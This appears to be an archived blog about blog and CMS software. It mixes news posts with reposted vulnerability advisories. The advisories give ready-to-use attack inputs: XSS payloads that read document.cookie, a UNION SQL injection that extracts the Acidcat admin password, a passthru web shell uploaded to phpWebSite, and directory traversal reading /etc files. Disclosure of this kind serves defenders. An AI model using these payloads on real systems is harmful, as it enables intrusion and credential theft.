Monday, February 26, 2007
XSS in b2Evolution
Vulnerable versions:
0.9.0.12, 0.9.1, 1.6-alpha, 1.8.6, 1.9.1-beta
Exploit:
http://[site.com]/htsrv/login.php?redirect_to=%22%20onmouseover=%22
alert(document.cookie) <--- in 1 string.
Monday, July 10, 2006
PluggedOut Blog SQL INJECTION and XSS
PluggedOut Blog SQL INJECTION and XSS
PluggedOut Blog is an open source script you can run on your web server to give
you an online multi-user journal or diary.
It can be used equally well for any kind of calendar application.Rather than
give you a thousand things you don't really want ...
PluggedOut Blog : http://www.pluggedout.com/
Credit:
The information has been provided by Hamid Ebadi (Hamid Network Security Team):
admin@hamid.ir
The original article can be found at:
http://hamid.ir/security/
Vulnerable Systems:
PluggedOut Blog Version : Version: 1.9.9c (2006-01-13)
example :
The following URL can be used to trigger an SQL injection vulnerability in the exec.php:
http://[PluggedOut Blog]/exec.php?action=comment_add&entryid=[SQL INJECTION]
and XSS
http://[PluggedOut Blog]/problem.php?id=1&data=>script<alert
('Hamid Network Security Team --> http://hamid.ir');alert(document.cookie)>/script<
Acidcat ASP CMS Multiple Vulnerabilities
It is free for non-commercial use.Acidcat CMS is also an open source product.
The product has been found to contain multiple security vulnerabilities allowing a remote attacker to find administrator username and password.
Acidcat ASP CMS :http://www.acidcat.com
Credit:
The information has been provided by Hamid Ebadi (Hamid Network Security Team):admin@hamid.ir.
The original article can be found at: http://hamid.ir/security/
Vulnerable Systems:
* Acidcat CMS v 2.1.13 and below
Example :
The following URL can be used to trigger an SQL injection vulnerability in the main_content.asp page: http://localhost/acidcat/default.asp?ID=1'
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'ID = 1'''.
/main_content.asp, line 16
Vulnerable Code:
The following lines in main_content.asp
Item.Source = "SELECT * FROM Item WHERE ID = "+ Item__MMColParam.replace(/'/g, "''") + "";
Exploit:
The following URL will illustrate how you can easily find administrator username and password by entering the following URL:
http://localhost/acidcat/default.asp?ID=26 union select 1,username,3,password,5,6 from Configuration
The base path of the login is :
http://localhost/acidcat/main_login.asp
Database Download:
The database can be downloaded over the web (default installation).it can be found on http://localhost/acidcat/databases/acidcat.mdb
Sunday, March 06, 2005
PHP include in phpWebSite
Summary:
Anyone, who has permissions to add announces, can upload php-script asa .gif file and execute it.
Example:
http://[target]/images/announce/[anyname].gif.php?nst=ls –la
Where [anyname].gif.php - php-script with this line:
passthru($_GET[nst]);
Vulnerable Systems:Official Website: phpWebSitephpWebSite <= 0.10.0
Multiple Vulnerabilities in PHP-Nuke (db.php, index.php, Downloads, Web_Links)
Multiple Vulnerabilities in PHP-Nuke (db.php, index.php, Downloads, Web_Links)
Summary
Php-Nuke is "a popular open source content management system, written in PHP by Francisco Burzi. This CMS is used on many thousands websites, because it's freeware, easy to install and manage and has broad set of features".Multiple vulnerabilities were found in PHP-Nuke that result in Path Disclosure and Cross Site Scripting.
Credit:
The information has been provided by Janek Vind.The original article can be found at: waraxe.us
Details
Vulnerable Systems:
* PHP-Nuke version 6.0 up to version 7.6Path
Disclosure:
There are several path disclosure in PHP-Nuke when any of the following sample URLs are accessed:
http://localhost/nuke75/db/db.php
http://localhost/nuke75/index.php?inside_mod=1
http://localhost/nuke75/modules.php?name=Downloads&d_op=menu
http://localhost/nuke75/modules.php?name=Web_Links&l_op=menu
Cross Site Scripting
There are two parameters in the modules.php file that are vulnerable to Cross Site Scripting attacks:
Friday, January 14, 2005
Interview with Lee Eason
He told some interesting things, for example, that PostNuke's greatest weakness is also its greatest strength: the modular nature of the system. Lee is also the author and director of pnFlashGames and pnFlashGames.com And he told, that pnFlashGames has also weakness - "Well, the weakest part of my module is the pnHTML I think"
So read the interview :-)
Thursday, January 13, 2005
New Microsoft CMS Book Released
The book presumes a working knowledge of the .NET Framework and familiarity with the C# language, but no prior knowledge of MCMS is required.
The following topics are covered in detail:
The basic concepts of MCMS
Preparing, installing and configuring MCMS and its supporting technologies
Creating an MCMS website from scratch
Creating and debugging templates files and channel rendering scripts
Working with dynamic navigation
Establishing user roles and rights
Authoring with MCMS and improving the authoring experience
Understanding and customizing workflow
Working with the Publishing API
Site deployment techniques
Enhancing your site's performance with caching
Source: http://www.cmswire.com/cms/web-cms/new-microsoft-cms-book-released-000502.php
Shop: http://www.packtpub.com/book/mcms
Tuesday, January 11, 2005
Angelinecms 0.7 screenshots
Here are some screenshots from the future version of angelinecms:
New user manager: shot1, shot2
New group manager: shot1, shot2
Source: Couple 0.7 screenshots
Simple PHP Blog Directory Traversal
Summary
Simple PHP Blog requires "no database to create a blog system but instead only requires PHP 4 (or greater) and write permission on the server".Two vulnerabilities in Simple PHP Blog are caused by inadequate testing for directory traversal attacks allow a remote attacker to view arbitrary files and create arbitrary directories.
Credit: The information has been provided by Madelman.
Details
Vulnerable Systems: * Simple PHP Blog version 0.3.7r1 and prior
Immune Systems: * Simple PHP Blog version 0.3.7r2 or newer
We can read any file with TXT extension (in this example /etc/X11/rgb.txt)
Request: http://[SERVER]/sphpblog/comments.php?y=05&m=01&entry=../../../../../../../etc/X11/rgb
Returns the content of the file
We can create arbitrary folders in the file system and the content of the post will be saved in this folder. To create folder http://[SERVER]/sphpblog/createdir/
Request (this must be a POST request and we must modify entry parameter):http://[SERVER]/sphpblog/comment_add_cgi.php~ entry=../../../createdir
Source: Securiteamb2Evolution 'title' SQL Injection
b2evolution is "probably the most comprehensive blog engine you can find".An SQL injection vulnerability has been found in b2evolution's 'title' parameter, allowing a remote attacker to cause the program to include arbitrary SQL statements inside its existing statement.
Credit:The information has been provided by r0ut3r.
Details
Exploit:The following URL will trigger the vulnerability:
http://vulnerable/index.php?blog=1&title='&more=1&c=1&tb=1&pb=1
Workaround:
1: manual edit:
Open the file /blogs/b2evocore/_class_itemlist.php and find the following code around lines 197-201:
Code:
// if a post urltitle is specified, load that post
if( !empty( $title ) ) { $where .= " AND post_urltitle = '$title'"; }
Replace these lines like this:
Code:
// if a post urltitle is specified, load that post
if( !empty( $title ) ) { $where .= ' AND post_urltitle = '.$DB->quote($title); }
2: patch files
Download the following file: b2evo-0-9-0-11-fix.zip , unzip it and replace the two enclosed files in in the blogs/b2evocore folder. This second method also fixes a small harmless bug that would cause an error when testing the SQL injection issue is fixed.
Source (bug) : Securiteam
Source (woraround): b2evolution forums.
wp-plugins
Developers can:
Host their development for free
Be assured of high visibility
Manage their code using an SVN client
Track issues (bugs) using the tracker
Provide documentation using the wiki with the help of end-users.
WordPress Users can:
Browse all the plugins and themes.
Download plugins and themes from one location.
Provide feedback to plugin developers using the tracker.Help improve the plugin or theme.
Develop documentation at the wiki page for the plugins they use.
Stay in the the loop using the RSS feeds.
Source: http://wordpress.org/development/
BLOG:CMS
Features?
An overview of the most important BLOG:CMS features is given below.
Standards compliance
BLOG:CMS is probably the only system that is not only w3c valid, but also ships with application/xhtml+xml MIME type by default, for top performance on modern browsers like Mozilla, Firefox, Safari and Opera. But BLOG:CMS will also automatically supply older standard, text/html, to browsers which cannot handle this, like obsolete Microsoft Internet Explorer.
Maintenance of one or more weblogs/news-sites
With BLOG:CMS, you can set up one or more weblogs. If you want to, you can even show the contents of multiple weblogs on the same page.
Integrated Forum
With BLOG:CMS, you can host discussions to your articles in either your weblog, or in a forum. This gives you much more possibilities and freedom for larger discussions. BLOG:CMS members are automatically registered in your forum as well, and within your weblog you can see date and time of last forum post for each article.
Integrated Photo Gallery
Today, when digital cameras are more common than traditional ones, personal presentation without a Photo Gallery almost could not exists. BLOG:CMS ships with Singapore Photo Gallery, using GD2 and/or ImageMagic to create thumbnails.
Wiki engine
Wiki engine is a great tool for any documentation needs, for colaboration on projects. Anybody can add information to Wiki resource. Some of the worlds biggest knowledge resources are based on Wiki engines. BLOG:CMS comes with Dokuwiki engine, one of the best, and standards compliant.
Download!
You can always download the latest release of BLOG:CMS at sourceforge.net. Both zip format for Windows users, and tar.gz format for GNU/Linux users are provided.
These releases are currently available:
Release 3.5 - weblog, forum, photo gallery, news, wiki and contact sections (2350 KB): blogcms.3.5.2.pl3.zip (recommended).
Release 3.4 - weblog and contact sections (1150 KB): blogcms.3.4.final.zip.